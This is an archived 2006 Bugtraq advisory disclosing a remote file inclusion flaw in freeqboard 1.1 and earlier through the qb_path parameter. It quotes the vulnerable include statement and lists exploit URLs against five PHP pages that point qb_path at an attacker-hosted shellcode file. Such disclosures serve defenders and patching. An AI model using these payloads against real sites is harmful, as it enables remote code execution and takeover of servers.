Bugtraq mailing list archives

freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability

From: "-= SHELL =- -= SHELL =-" <she1l () hotmail com>
Date: Fri, 01 Dec 2006 11:32:26 +0300

##################################################

### freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability#### Author: Mr.3FReeT#### Softname: freeqboard###

##################################################
#
# code in :
# about.php  ,  contact.php  ,  delete.php  ,  faq.php  ,  index.php
#
# include "config.php";
# include $qb_path."incs/mysql.php";
#
##################################################
#
# Exploit :
# """"""""
#
# www.site.com/[path]/index.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/faq.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/delete.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/contact.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/about.php?qb_path=shellcode.txt?
#
##################################################
#

# GreeTz: [ Dr.2 ] , [ ToOoFa ] , [ General C ] , [ asbmay ] , [ q8i^rock ], [ SHiKaA ] & KuW SeC TeaM

#
##################################################

_________________________________________________________________

Express yourself instantly with MSN Messenger! Download today it's FREE!http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

Current thread:

freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability -= SHELL =- -= SHELL =- (Dec 01)